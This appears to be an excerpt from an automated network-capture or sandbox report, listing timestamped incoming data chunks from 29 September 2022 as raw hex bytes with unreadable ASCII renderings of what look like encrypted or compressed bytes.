                                                                                                                                                2022-09-29 12:51:45 UTC26169INData Raw: 3d 6f f5 01 ef 10 24 5b e3 11 6d 6f 07 70 38 d8 b5 80 3b 2b 72 a2 eb 6b 56 8c 2b 27 c2 0a d3 bb 67 e5 df b6 1c 39 0d 5d e8 24 2e d9 3e 02 e6 8d 01 5c ce de 38 4f 10 82 8a fb 74 f8 71 06 f5 10 e9 7f 47 5f dd e9 7d 35 fe 51 1b bf 31 42 fd ad 58 ce d7 8b 7d ae 07 09 1f e8 1b d5 a8 7d f0 10 6d fc 00 81 b4 c4 24 10 92 f4 b8 bd d8 e3 23 2b c0 ea 1f d3 96 5d 24 52 34 63 c0 0f 50 74 7e cd 36 b2 80 34 f4 92 8a f2 4f 79 3a d4 ce 9b 8b 4b 89 5c be 4d d9 cc c7 07 ff 8d 51 8e c1 f1 bf d6 03 7d d9 45 78 4d 8f 93 76 a6 ab d2 7e 7f 12 70 f3 7f 90 a9 53 69 88 79 25 e2 36 cf 12 58 0f 49 38 ea ee a6 27 68 77 0d ce 3d 2e b6 b3 db ab 3d 72 58 a3 30 df 2f ca 4f 80 a5 36 d0 30 1d 16 fd b1 85 b9 4a 2c d2 63 a3 a0 b4 be f9 90 32 db d6 da bf d2 a0 99 86 1d 02 78 1c be f6 6a 86 2a
                                                                                                                                                Data Ascii: =o$[mop8;+rkV+'g9]$.>\8OtqG_}5Q1BX}}m$#+]$R4cPt~64Oy:K\MQ}ExMv~pSiy%6XI8'hw=.=rX0/O60J,c2xj*
                                                                                                                                                2022-09-29 12:51:45 UTC26185INData Raw: 0d ca a4 de 75 04 e9 c3 8b 5a f1 bf 56 7b c8 c3 d1 91 69 a4 38 21 87 2c 00 68 b2 3a c4 1b 05 16 d5 b5 cb 22 70 98 17 ba c8 2b 15 c1 d5 ce 27 d8 b0 f1 ad f2 63 70 07 be 63 ab 58 a2 ab 2f a7 dd ad 89 32 8d 93 04 7b 4e 63 64 c9 e2 13 d5 c9 4c 66 85 08 cd b6 c1 88 73 09 7b cc 8d 84 32 ce 17 24 fd 0c 47 ec 2c 80 32 ca 8b d5 d8 f9 94 60 20 cc 21 5a b2 af 4b 69 c5 6e 61 f1 3c 7e 16 59 c0 9f 7d 88 ec 5b fe 02 61 e7 cf 31 7f f3 99 e9 da ef 5c 6c 45 d5 1d 5a 81 7f b4 42 ed 09 50 9c 16 f6 18 bf e5 a0 85 ea 85 88 6d 06 28 ce 28 65 72 91 27 1a a6 03 b5 44 f1 85 a8 05 ed c9 f6 0f 50 78 e5 3d 9a 71 68 7b 9e 23 72 e1 04 6e 8e 95 95 a3 82 a4 a4 50 ab a5 9f fe 98 bb 54 32 3d a0 c5 67 b3 50 06 11 0a 09 10 af ea 18 6b 6e b9 dc e5 4b 4c 86 fa 62 ac 98 ce 08 c0 c3 f0 cc cc 39
                                                                                                                                                Data Ascii: uZV{i8!,h:"p+'cpcX/2{NcdLfs{2$G,2` !ZKina<~Y}[a1\lEZBPm((er'DPx=qh{#rnPT2=gPknKLb9
                                                                                                                                                2022-09-29 12:51:45 UTC26201INData Raw: 08 2f b9 ed 99 e4 da 8d c2 f2 58 0f c9 42 1d 29 49 93 0d 5e 5b e5 6e de da f2 d2 35 19 ce a7 1c 97 1e dc c8 a2 2e 70 89 87 e9 e3 89 88 d4 a2 47 30 2c 91 7b d8 ec d2 b4 24 ad 16 6a b7 81 9d f4 9a 1b 92 49 e8 06 6e 84 5a 22 c6 7b 6b a5 0b e5 80 22 f9 3c 05 05 d7 b2 e0 25 c0 6e 01 33 76 35 27 61 88 e4 e2 ec 25 fc f6 fe 60 fa 92 18 8d e4 d3 59 35 3c 88 fc fa 33 da 48 f5 07 6e 5b dc 37 07 f5 e1 a7 a8 d7 68 89 60 d7 cc b9 e4 67 8f 98 06 0b d9 32 4f c1 19 e2 20 fe 2f cd 54 89 e7 b5 30 fc 43 56 33 99 12 25 8d f2 55 4f 7e 88 e6 52 71 b7 a3 46 9e 1d 35 84 17 5b e4 c7 bd 70 2f 52 43 cc f7 a7 8e 48 87 80 c5 37 6a 74 ba c9 93 f4 f1 be 4e ab 8a 02 f4 e5 fe 8e d6 09 e2 43 57 c4 91 64 70 54 c5 7b 50 a7 a0 78 85 7a f9 c6 dc ce 27 ad 89 e0 86 08 30 a8 1c 41 be 32 3d aa 75
                                                                                                                                                Data Ascii: /XB)I^[n5.pG0,{$jInZ"{k"<%n3v5'a%`Y5<3Hn[7h`g2O /T0CV3%UO~RqF5[p/RCH7jtNCWdpT{Pxz'0A2=u
                                                                                                                                                2022-09-29 12:51:45 UTC26217INData Raw: 50 08 6f 34 f7 a8 52 d7 fb e2 e8 6a 5a 5b 1f 33 3b 36 2c c2 45 ff e0 89 aa b4 f4 da c2 4c fe 74 99 ea 14 7b 75 14 c5 94 02 3d f8 52 d9 8d f3 0d f6 c2 85 95 f0 fd 0b 9b ff d2 81 49 02 a4 54 b3 69 0c 2d ad ea b2 ae b7 02 ca 59 86 9e 63 2e 67 ad 4b e5 ab ea 9c a4 ae 9b 52 c2 73 a9 bf c2 a3 76 e2 a2 e7 dc 94 97 c0 91 69 0c 41 8f d5 10 cc 07 dc 0e 68 a7 15 c2 3f 40 a3 98 20 10 c8 e7 e3 47 6d 8b f3 5c ec 1a 47 e3 2a ba f6 b7 ab 41 52 ef c2 e4 0e 00 f2 56 1f a7 08 46 a2 d5 e8 a9 e9 38 81 90 ae 05 a6 6a d4 98 ac 1c f6 de f7 8e 51 06 44 59 3c 94 b0 a4 4a e2 e2 1f 16 db 60 64 9c 7d 43 78 a1 2b d3 d6 71 81 80 55 0b 3f 2d 78 fc ec 94 75 0b dd 37 fe 28 27 5f 08 d4 e8 56 93 42 38 37 84 aa 8d 95 16 03 71 26 f8 e4 3c 48 9c 3f a1 ec b8 c6 fd df bb fc 02 db 3f d3 80 21 35
                                                                                                                                                Data Ascii: Po4RjZ[3;6,ELt{u=RITi-Yc.gKRsviAh?@ Gm\G*ARVF8jQDY<J`d}Cx+qU?-xu7('_VB87q&<H??!5
                                                                                                                                                2022-09-29 12:51:45 UTC26233INData Raw: 80 21 fe c5 e3 51 eb 49 c6 33 78 d8 3f cb 74 cd 5b 45 b6 87 7d ac a0 79 9b 5b f0 e2 47 1a db 7e 44 da 9c d2 7c c9 33 08 bb 00 7c 04 6e 7c 46 42 8c 0a b7 13 ac 7a 1b 14 56 b2 f1 12 c6 54 cf 8f 15 95 47 1a 0e 4f 7e d7 ee f2 5d 97 db 25 d0 a9 6d 33 4e 1b 27 5c 2d 64 d8 3a 25 55 ad 8d 24 9c 1d 06 98 e4 74 f2 b2 aa f4 14 26 02 bf d7 dc b9 fa 82 72 89 54 5f f9 ef 92 6a 73 c5 2a 94 91 78 32 53 b7 c5 2f c6 1a b2 17 2e 62 6d 5d 0b a2 91 3c 21 e7 e1 dc 4e fa 20 cb 69 99 7d 18 0c 03 9f 7e 7f 7e 44 ce d2 d1 c1 5c 6a a9 86 99 7b ac cd 6f f3 d9 45 a7 a5 27 10 e0 8b a3 6e 0b 98 8d 0f 95 9e d7 ec fe ba 2a 9e 32 22 31 d6 0a 55 a5 b7 a0 65 71 73 e9 3d c5 73 00 3e 3c 36 bf 0c 8d 49 8a 83 89 21 55 4e bf 1e 30 d4 99 ee e9 38 69 c8 15 58 c3 d9 6d 04 db ff a1 d2 30 6a 79 e7 cc
                                                                                                                                                Data Ascii: !QI3x?t[E}y[G~D|3|n|FBzVTGO~]%m3N'\-d:%U$t&rT_js*x2S/.bm]<!N i}~~D\j{oE'n*2"1Ueqs=s><6I!UN08iXm0jy
                                                                                                                                                2022-09-29 12:51:45 UTC26249INData Raw: a4 45 18 a4 02 b5 a5 dd 7a 88 5e c7 c1 52 fb b2 c8 d8 03 6e dd be 69 90 94 10 0f 76 16 ea 91 06 23 74 7c 37 da 60 9d 06 5b 72 0a 2b 07 b3 a7 d4 88 a7 2a 2a 2c 33 47 b4 e4 4d 6f e5 0c 3f 07 93 41 1b b8 05 b0 1e e8 17 34 ab a6 2f 39 b8 a4 46 9d c7 36 b9 02 b9 1c 93 06 52 32 5c 8a ad de 5e c7 ba 4c 7a 1f 29 96 81 3c e5 08 fc 69 dd 33 7d db 55 2f 8c 1e a9 0d 23 17 12 b3 c5 8d 56 c3 64 f9 e6 2d 13 8c d5 74 bd 71 69 5f 57 4d cb 57 72 42 6d 22 4c ec da ad 5e 80 6f bd 4e f9 1f fb dd 29 81 ac f0 0e 71 30 6e fd 57 bd 7a 43 c5 f0 8c f6 40 de f2 d6 ec 6f 56 15 43 88 de d1 6f 1c bb 9e e9 6f 4f ea b4 32 43 b7 12 05 17 a4 71 c7 9d 39 93 2f b4 b4 b9 0d aa 7e d4 09 3f c1 2e d2 6f f6 78 32 65 e5 88 2d ef 7c 33 c9 2c 8c b2 f1 15 1d 9e a9 e3 9a 84 52 3a 1d 27 5a 71 ef c0 a0
                                                                                                                                                Data Ascii: Ez^Rniv#t|7`[r+**,3GMo?A4/9F6R2\^Lz)<i3}U/#Vd-tqi_WMWrBm"L^oN)q0nWzC@oVCooO2Cq9/~?.ox2e-|3,R:'Zq
                                                                                                                                                2022-09-29 12:51:45 UTC26265INData Raw: d3 73 9f 95 2e fd b8 db f8 73 c9 98 b2 d9 13 85 69 20 ca 0d d8 33 67 d4 68 65 77 dc 26 13 7b 8f 71 75 64 39 31 a5 6e 6e 53 21 03 24 92 9c 9b 44 2c a6 42 a7 f6 c4 a9 d1 fb 90 4c ef 0c 93 14 b4 ef 5a de 1d 37 d2 82 d3 f0 c9 8f 2e 50 f3 39 9f 15 96 08 99 0c cf 7b f4 6b 38 bd 83 66 3b ea 89 33 da 4d f9 83 0a 3a 85 6d c3 99 c9 26 57 d5 a1 05 fc 9c 7d 1d 9f 47 69 e3 ed e1 97 a2 bc 6a be 27 c5 99 76 4a c0 98 aa 3a 32 ba 9f 6e e3 dd 50 9a 41 2e 2a 3e 88 96 43 31 84 1b 7f 57 b4 06 26 f7 68 3b 57 b0 55 81 75 b8 26 a2 cb f5 72 75 ce 77 c6 f3 43 d7 8d 82 dd b7 16 0e ec 18 36 bc 3b 5d 65 07 15 a8 0d bf df c9 ff 5c 1d c1 4a 83 d1 67 63 76 a3 87 25 60 9a d5 2b 82 37 de 01 ee e4 e9 c7 6d 49 9c e8 04 3c 8c 1d b4 b6 7f da e6 5b e9 16 20 9a 15 93 c7 a9 96 1d c3 89 2a ff 25
                                                                                                                                                Data Ascii: s.si 3ghew&{qud91nnS!$D,BLZ7.P9{k8f;3M:m&W}Gij'vJ:2nPA.*>C1W&h;WUu&ruwC6;]e\Jgcv%`+7mI<[ *%
                                                                                                                                                2022-09-29 12:51:45 UTC26281INData Raw: b8 b5 0d 6c 16 8d 0d f1 b7 c8 43 ed a7 e9 b4 d3 a8 30 85 f3 6f 9d d1 b6 dd 9e 50 b9 a6 58 bb 49 65 3e b3 cf 25 78 28 b5 cf f2 6b d5 74 9d cb dd 57 6a a5 87 45 19 20 44 0e a2 6c 6a 49 9e 12 5c af 3e 55 89 a2 74 a3 82 a8 a3 0f a2 56 8a 74 79 c5 ac cb 19 6c 36 79 1d 2a 1e 74 1d bf f7 92 9f 3d d5 08 ba 50 b0 2c 3a 9d c8 9b 7a fd a2 a3 1f 53 4c 30 66 46 ae 54 b3 3c 8f 4f 6e 2c 94 56 25 5f fa a2 69 2e 18 7e 20 f5 26 e0 2f 9f 4b 72 da 8b 32 a6 cb 15 68 ea 45 25 aa aa 25 fe 45 64 85 39 49 69 cd 50 e7 e8 19 c5 6b 75 c3 00 c7 b7 c3 f3 42 5c ad a1 9f a0 be bd f2 9e 60 52 6f 77 7e 2e 95 63 dd b2 62 f3 53 3f 8a 33 16 47 96 56 ed 9a f8 20 6e db fa 01 30 2e 9f d9 95 56 71 c8 d6 ca 2e de 36 65 8f 11 c1 33 4c ff ca bc 3c 9b 13 45 56 29 e7 74 a2 aa c2 a2 ab 61 6a 44 85 31
                                                                                                                                                Data Ascii: lC0oPXIe>%x(ktWjE DljI\>UtVtyl6y*t=P,:zSL0fFT<On,V%_i.~ &/Kr2hE%%Ed9IiPkuB\`Row~.cbS?3GV n0.Vq.6e3L<EV)tajD1
                                                                                                                                                2022-09-29 12:51:45 UTC26297INData Raw: 1f 54 08 ae c8 e3 d4 39 56 c5 2a 35 22 30 20 0d 11 8b 80 ff ff f5 08 3f e5 4e 93 cb c4 8d cd 33 fa 89 65 df 95 26 c6 a4 24 cb 1c dd af ff 7f c9 f8 26 56 24 92 4d 52 15 35 87 dc 6b 15 01 3f fd 51 53 d4 d7 7c 3d 27 82 9c c7 0c 98 a2 7e 7d 00 68 5e 89 97 51 15 ec 12 8d a4 fd 20 20 27 f1 5d d7 20 e2 65 e0 f0 7b 3a 7b 78 40 74 5d 00 2d d3 73 8f 3f 38 89 3d a5 02 c9 13 8f ef 95 2f 6c a8 18 e2 b8 b0 d4 d3 b0 7f 21 15 f2 17 3c a9 39 33 77 16 4a 6f 80 23 7d dd 48 6c 0a 65 a6 9b 93 cd 1d 17 eb fa 85 a1 88 ae 00 5f 98 92 7e 46 09 c2 00 a0 9d 43 e2 6a ea e4 69 9a 34 64 a3 ac 3a 96 38 32 4d 40 b7 49 7a ff ba dc fb 12 15 54 45 16 b9 6e 0f fb e1 a7 18 54 65 18 1d 99 7b 28 1e 1b a9 e9 f1 df 92 35 68 77 f9 38 5b e5 cf 64 74 6d 9b eb c5 b9 92 06 c4 15 30 28 fb b3 15 62 96
                                                                                                                                                Data Ascii: T9V*5"0 ?N3e&$&V$MR5k?QS|='~}h^Q '] e{:{x@t]-s?8=/l!<93wJo#}Hle_~FCji4d:82M@IzTEnTe{(5hw8[dtm0(b
                                                                                                                                                2022-09-29 12:51:45 UTC26313INData Raw: 51 c5 f8 1d 7a 50 aa 6f 12 d7 3a db 2c 4e f9 b0 3f 5d 58 43 81 18 2a 85 dd 0a 8b 05 59 af a7 41 3c 1b c5 38 57 ea 49 f7 16 68 92 fb 4a e7 ce 59 47 a5 7c 8c 82 4f 48 21 0d 5f 6a 53 89 95 d3 e1 ad eb 88 e6 7b 6f ae dc 7b e1 85 2a 46 32 fb 30 7f 48 83 60 8f ce c1 d5 3f 6f 06 84 75 54 88 d2 2c 6e 2b 74 2f 87 06 5b 99 f7 09 43 85 84 8e d3 56 32 0b 04 ff ae aa 3a de eb a1 68 ff a5 5f 88 23 c5 f9 54 83 5e b9 1a 95 7e 2b 98 fd 18 2d d9 95 e1 49 06 ef 06 ea 28 de d8 c2 ec 06 e3 d0 e0 db 0e 67 5b e7 16 5c 1b 1a d7 92 77 86 e4 37 55 ad 4e 46 e5 f1 1a 88 b5 fd 7c d0 ab 43 94 39 b0 be 9a 7c b7 9e 45 d7 25 39 4c c8 5d d6 6f 87 99 24 89 fc 8b f2 f5 06 e5 30 cd f1 ab a5 ac bc 3b e1 8d 11 c3 82 fe 55 45 21 a0 ca 9b f4 54 da ec a7 ac b0 e8 b3 58 29 04 93 90 89 92 c2 b3 a7
                                                                                                                                                Data Ascii: QzPo:,N?]XC*YA<8WIhJYG|OH!_jS{o{*F20H`?ouT,n+t/[CV2:h_#T^~+-I(g[\w7UNF|C9|E%9L]o$0;UE!TX)
                                                                                                                                                2022-09-29 12:51:45 UTC26329INData Raw: 18 0d 10 81 e6 d8 ce d5 f2 82 03 eb 06 b7 c0 20 f3 94 7b 52 98 fe fc 41 c1 1c 29 61 7b aa 78 7d 71 27 5a 05 61 bf be 20 23 66 af ab 98 e1 4e 96 b6 e2 12 ee d3 16 65 d9 22 6c 6c e3 61 70 f2 2d c7 ee 20 58 9c 1c f8 a1 2f 39 3c db a3 b0 bc e0 66 27 cf 7f ee 35 7f 96 89 3a 10 b0 74 14 05 18 da d0 9d 25 8a 4d 58 5c 90 56 a0 a9 89 dd e2 bb 36 ac 59 8a 91 05 f6 69 37 55 6d ec f5 ac d5 7d 8a fd 3d 50 91 7e 97 da 69 e4 26 90 2b 71 f9 de 6c d4 89 25 a7 4d 75 17 27 21 4e 60 e3 95 3e dc f1 24 88 42 aa ef 04 83 48 19 42 28 08 9c 58 20 a6 f3 2c a7 d5 2e 2c e7 6a 0e 4a db 29 d5 8f ba 70 ee ee f4 ba 18 94 1b b5 68 89 9b 71 31 5e 5c 2a b8 df b4 4d d2 38 e9 85 de 7b cc a1 2a 1c 78 5b d8 d0 9d b8 b6 97 d1 4e 77 38 95 a4 73 9f 71 fe 38 ab 18 ad cf ae 51 c8 0a 83 40 77 d8 0a
                                                                                                                                                Data Ascii: {RA)a{x}q'Za #fNe"llap- X/9<f'5:t%MX\V6Yi7Um}=P~i&+ql%Mu'!N`>$BHB(X ,.,jJ)phq1^\*M8{*x[Nw8sq8Q@w
                                                                                                                                                2022-09-29 12:51:45 UTC26345INData Raw: bb 51 9b 35 8f 92 30 9f bc 0b d8 a8 05 d4 3f e6 ec fc 29 8a 61 87 92 29 2e 0f 98 df c5 36 67 1c 85 19 c3 3e e1 8e 81 64 4b 5b f4 b9 ba ef 17 55 4b 08 8e 82 c7 29 66 8b e6 2b f7 1e 45 ea 15 c5 f9 93 cb a4 bd e1 26 74 65 3c 60 74 dc 88 28 c3 6e 86 4a dc 3a 40 83 7b 29 35 f4 7e 9f b3 49 ee 49 4b 24 28 44 3a be 07 b1 f4 fb 12 8c cd 6b cb c0 c7 e9 21 0e 4d 83 a7 d3 72 e0 46 09 54 c3 8d 82 3e 40 e4 b6 88 6c 11 1e 18 ba 74 29 f4 94 90 77 a1 70 6c c4 a3 6b b1 d1 e1 3c 97 65 70 3e e1 7a e2 5e 47 03 71 3a 58 91 24 e8 ab 11 4c 20 fb 99 ab 02 b2 65 08 80 73 32 87 12 89 56 15 d7 b2 69 78 bd 56 f7 b5 f4 d5 dd b7 6b 46 02 11 00 73 cc 75 0e b5 af 44 03 c4 61 d9 04 96 a5 dc fb 14 1d 27 0f cc 08 4f 2a a7 6f 19 b4 03 49 75 77 35 56 8a 95 03 5b c1 df 52 2f 42 30 bf d9 4a 18
                                                                                                                                                Data Ascii: Q50?)a).6g>dK[UK)f+E&te<`t(nJ:@{)5~IIK$(D:k!MrFT>@lt)wplk<ep>z^Gq:X$L es2VixVkFsuDa'O*oIuw5V[R/B0J
                                                                                                                                                2022-09-29 12:51:45 UTC26361INData Raw: 0f 40 f8 b0 4a 82 9c 90 66 ae d9 d9 88 2f f5 3f ab b6 8c 13 70 e6 af c2 56 c5 19 d2 d0 01 03 ca 27 8c a6 79 20 bc 5e fb e6 37 11 33 6a 8e b6 5f d4 8d f7 56 95 e0 17 15 b6 be 48 ee 5b 92 00 b3 cb 44 9a f6 c6 bc 16 b0 53 c7 c9 7b 1e 3b 4d 9d bb ec 0b 16 1f a5 53 1c 29 95 8a 78 9a cf b7 b4 70 31 3c 16 ca 48 fb c8 1e ef c4 4f 8e 21 51 f5 6c 36 90 03 aa b5 a3 d6 8a 05 f9 72 dd c3 05 8b ce 61 d8 71 64 83 c2 a2 78 14 f1 d9 62 10 90 e7 7e 26 2a e6 a8 7e f6 ab a8 e8 6a 55 0d c1 e5 6f e8 a8 62 fb 3e bf e8 ad a8 82 01 64 da d2 fc a2 f8 35 44 74 da d9 83 01 d7 b4 45 67 85 dc 27 4d 65 b3 82 ca 94 55 9f b2 39 ea 78 4a 1e 84 90 85 f5 37 38 e2 bb 85 7b e0 58 2b 50 b5 67 78 f6 0f 7f 70 be 67 25 17 0c ef 49 d9 1a 93 d5 82 a7 d2 34 c4 69 fa 71 72 f1 df c2 cf 8f f0 a3 41 24
                                                                                                                                                Data Ascii: @Jf/?pV'y ^73j_VH[DS{;MS)xp1<HO!Ql6raqdxb~&*~jUob>d5DtEg'MeU9xJ78{X+Pgxpg%I4iqrA$
                                                                                                                                                2022-09-29 12:51:45 UTC26377INData Raw: f5 f7 01 80 de c0 4e 37 cf eb fe 91 f0 4d f3 4b 1d 1b 15 07 56 21 18 ce 40 c2 e6 0d ff c2 25 41 a4 15 c5 4b 86 84 c2 92 7d df 10 1b f5 aa a7 7f c2 db a4 68 f8 19 75 b4 b1 f9 a4 ca 75 f6 6b f0 a5 f7 5c 05 dd a4 4a 15 96 c2 97 5a 75 18 0b c4 64 03 00 13 21 bd 96 9f 05 6f 24 4b 41 a3 b2 51 06 58 a0 a1 2b a3 b1 f5 90 d8 c9 76 82 fa 9f f8 60 c0 16 18 05 25 17 9c 55 d7 ee c4 c0 20 0a b1 a7 30 ed ce e9 c6 3b 64 f6 ce 66 ff 2b 6f 32 5f d6 ae 55 f3 9b 29 4c 8b 33 6c 88 3d 77 71 92 30 62 96 76 a4 04 5e 37 cd 4c 9c 94 35 eb 43 01 c7 06 bb 3f cb 12 0c 17 0d 48 ae 96 dc 4f b7 46 e3 9c c1 1e 17 cc fd dc 68 93 f2 4f 83 09 63 a4 91 34 af 47 99 25 a0 f5 4f 46 17 2f 6f e8 05 3b 1e 3c 88 b3 cd 20 ff d7 47 56 69 23 a3 fb ff 92 15 3c 6b b2 e7 14 e4 35 e6 75 cb e4 0e f5 a1 3a
                                                                                                                                                Data Ascii: N7MKV!@%AK}huuk\JZud!o$KAQX+v`%U 0;df+o2_U)L3l=wq0bv^7L5C?HOFhOc4G%OF/o;< GVi#<k5u:
                                                                                                                                                2022-09-29 12:51:45 UTC26393INData Raw: d4 6b eb 4a a3 19 16 1c 30 b6 3f 6d 9e 79 c1 3a f8 21 4c ec 19 d2 b7 ee 06 24 6c 9f 50 d0 c9 c5 76 fc 06 2a 45 9c 54 41 9c c8 e4 11 1f 43 31 25 44 6d 76 92 60 6d df 15 50 76 7a 20 c4 90 9a 45 e1 2d 9b e9 54 98 b2 99 de 4e ff 19 99 39 34 c7 7c 66 cd ff dc ba 42 48 5d a4 95 b8 ba 2e c4 0c c1 d1 9e 10 60 32 d4 d6 f4 22 02 e1 3a f1 20 35 72 6c 37 9d e5 86 c0 e1 43 b7 93 40 fd e8 f8 52 5e 73 b9 98 90 1c ef eb f5 11 d7 11 2d d2 d4 e9 39 62 b4 ad 80 20 ac 56 2b 40 97 bf 43 5d 85 49 7f c9 4d 30 4d 34 19 8e 5e 10 4e 10 3e d0 17 de 69 72 0e 04 07 ad 8f dd 87 54 ec 62 e9 48 ba 49 7b 55 f7 7c 3f 1f 57 59 7f a8 7c 03 eb f1 8b 30 86 ce 15 14 fc 68 b3 8c 82 15 7e bf b5 bd 2d 9e f0 b3 f9 0d bb 80 25 3f 26 01 6b 0c 64 d0 13 09 b8 ec 78 7e 98 29 87 a5 05 16 b9 24 a5 f0 88
                                                                                                                                                Data Ascii: kJ0?my:!L$lPv*ETAC1%Dmv`mPvz E-TN94|fBH].`2": 5rl7C@R^s-9b V+@C]IM0M4^N>irTbHI{U|?WY|0h~-%?&kdx~)$
                                                                                                                                                2022-09-29 12:51:45 UTC26409INData Raw: c4 b4 9f 9e 55 90 8e 51 43 e6 18 c9 0c 11 7e 5e be 21 1a 2f 7d a4 ce b6 1d 42 16 c6 ce 6d f1 9a 2a 30 34 72 94 4c b0 b7 5c 94 e8 c4 96 96 ad 1b 05 d6 19 25 87 4f 4a f9 c4 c1 48 f3 e4 e5 9f 3b a6 49 ad 48 9f 50 88 34 9d aa 47 33 fd 86 c1 45 35 2e a5 b6 e5 b2 61 33 70 66 ed d3 09 e6 6a 14 aa b5 48 e5 ed de 83 cc 79 3e d4 55 ee 22 64 90 d5 03 34 6c 51 38 9e 36 1c f4 77 f7 69 b8 ce 57 2d af 98 9f 5b 5a 80 c8 9c 6a 3c 84 a3 e4 cb 91 71 ac 70 97 02 72 54 53 37 8f 81 e1 3c 64 bc 0b dc 3f 58 5e 0c d2 d5 f9 c9 17 35 38 7a 59 2b 75 f9 34 59 0d a7 b1 96 99 3a 2e c8 8c 73 38 ea e4 68 7d fc c8 c8 11 9b 71 bc 92 84 83 67 ba f4 73 0e fc 63 0c 8b 01 1f 55 62 54 2f f0 b4 5c 4a d9 2c 7a b9 43 f1 4b 7c 64 fb b7 56 a4 52 35 01 21 f0 8e 8c 0d dc 55 98 50 1c b1 e0 2d 25 45 62
                                                                                                                                                Data Ascii: UQC~^!/}Bm*04rL\%OJH;IHP4G3E5.a3pfjHy>U"d4lQ86wiW-[Zj<qprTS7<d?X^58zY+u4Y:.s8h}qgscUbT/\J,zCK|dVR5!UP-%Eb
                                                                                                                                                2022-09-29 12:51:45 UTC26425INData Raw: b4 ee dc 26 6c 3e 7e 42 c2 41 6d 64 25 a3 76 9a 95 bf 35 f5 c3 6b f2 93 0c cc 02 2a eb 32 64 c7 e4 9a 6f c9 3e 87 27 8e ef 40 29 43 06 1f 7f f0 93 33 77 30 2e 70 be 6e 80 c1 40 35 4d f2 bd 89 e2 2f 4b ac 32 df 9d bd cc 5d cf 6d 7d 54 d9 7d b2 f4 fb 66 7e a0 15 54 43 85 e9 1b a5 15 e6 a5 5b f6 94 6d f9 7a 3f f3 35 a5 da 91 d4 37 a4 67 14 12 de 3e 18 1e 12 61 6f 1b cb 4c 48 23 6a a0 28 04 00 5a 1b 1a b6 5f 76 75 5d 1d 71 4c e3 ed ad 54 bd 30 e2 e4 a1 01 bc fc fd 96 21 21 f0 76 d1 21 f9 f0 49 8e d9 dd 5e a3 bf 9e 73 3c c7 2e 69 e4 9c db ca f9 d9 42 be 87 5a 2a d0 39 fa be 58 ec 32 26 02 c1 b9 7c 32 65 59 a6 25 b8 1f 4a 7d a8 7c 89 49 81 3c 86 6a 6c 4b 20 d6 fc 13 f7 af ac 69 24 f7 25 4b 5a a5 49 9c ab 01 f4 45 de 55 98 a9 af a3 04 5c 1e ca 2e 3d 24 47 5e 6d
                                                                                                                                                Data Ascii: &l>~BAmd%v5k*2do>'@)C3w0.pn@5M/K2]m}T}f~TC[mz?57g>aoLH#j(Z_vu]qLT0!!v!I^s<.iBZ*9X2&|2eY%J}|I<jlK i$%KZIEU\.=$G^m
                                                                                                                                                2022-09-29 12:51:45 UTC26441INData Raw: 49 89 cc 91 a6 a8 98 8f f3 5f 6a cb 69 1f 17 64 75 2c e9 28 ce 0b 62 59 37 2a 56 a7 c0 1c 9a c5 af 72 08 0b da 15 1b 06 97 f8 7f b0 42 41 3f de 52 b1 c0 ef 02 00 74 67 61 18 5b bb 5c 59 a0 7c 81 2d 2e 4a 66 41 84 bc a7 89 3f bc 6a 03 85 23 a6 b5 33 c4 51 6c f2 a2 40 c6 da fc 7e cc d2 fd 87 47 a1 05 62 81 60 7e 6e df 2e 98 ca f9 ed 60 3a 93 b1 9c 3d b8 da 69 8d 48 61 f7 ef 8c 92 27 97 a2 a1 28 1b 1d 42 fc 7c b0 e2 c6 3c 2b e7 d5 3f d0 8a b7 1d bd d9 26 30 06 12 d5 2d ec c1 b9 db 04 7f ab 67 40 43 76 41 bd 10 b4 27 ea 1d b9 ab 06 0c 08 f3 e4 d9 a8 93 6b f1 40 53 dc d5 a7 c3 a3 72 87 7c 6a 25 57 b3 44 39 30 7d ca 3d 3b 9b 8e 0a 85 d2 7e 48 1f 53 2b 13 f4 c0 b8 d7 24 53 56 20 aa 5a a1 b5 b2 4d 4e f6 01 d9 b9 6f a7 08 96 b9 14 24 d9 9b 7f b4 43 db 30 db b9 40
                                                                                                                                                Data Ascii: I_jidu,(bY7*VrBA?Rtga[\Y|-.JfA?j#3Ql@~Gb`~n.`:=iHa'(B|<+?&0-g@CvA'k@Sr|j%WD90}=;~HS+$SV ZMNo$C0@
                                                                                                                                                2022-09-29 12:51:45 UTC26457INData Raw: c9 1c ae 0e 23 9f 3e 55 9c af 38 99 3d e9 d7 d9 ed fe 65 c5 1a c6 b3 31 df 2e dd ec 86 df a0 a5 d4 05 60 1f 65 ce 33 31 ec 57 80 75 6c 97 69 db f6 0d 96 80 2b 11 4c bd ce f6 e1 d6 34 57 54 aa f5 a4 95 ba 2e bb 8e b7 a4 4a dc 9e 53 5a 7b 45 bf a0 74 10 bc 35 72 19 a4 e3 35 cf 2c cf 52 cd 5a e8 e1 77 b7 ac c7 62 1b 18 37 64 7e 70 06 cf 0b 14 ec 21 93 05 69 0a d9 b8 d1 e6 64 5a d6 92 a8 fb 5e c7 09 6e 7a 14 97 f7 a0 f0 c5 2d 03 87 86 76 00 09 8a 89 8a 85 b8 e9 0a 07 24 b4 f6 05 21 d7 5b b1 69 6f 36 ba 63 ab 42 7c 53 8d 7e b8 a6 e5 cb da cb bf 9e a5 8d b9 5a b2 89 bf 42 aa 2a 2e c8 ba a6 3b 18 94 f2 e4 e9 4e df 31 5a 6b 8c da 48 44 6b ad d0 f6 06 d1 55 9e 2a 3f 7f b4 d1 b2 f7 b8 ff ab 54 db 5f ef c7 da 1b 1d ff 82 8e 57 73 e1 44 c1 4c 4f 46 8f f1 eb 8f a8 fd
                                                                                                                                                Data Ascii: #>U8=e1.`e31Wuli+L4WT.JSZ{Et5r5,RZwb7d~p!idZ^nz-v$![io6cB|S~ZB*.;N1ZkHDkU*?T_WsDLOF
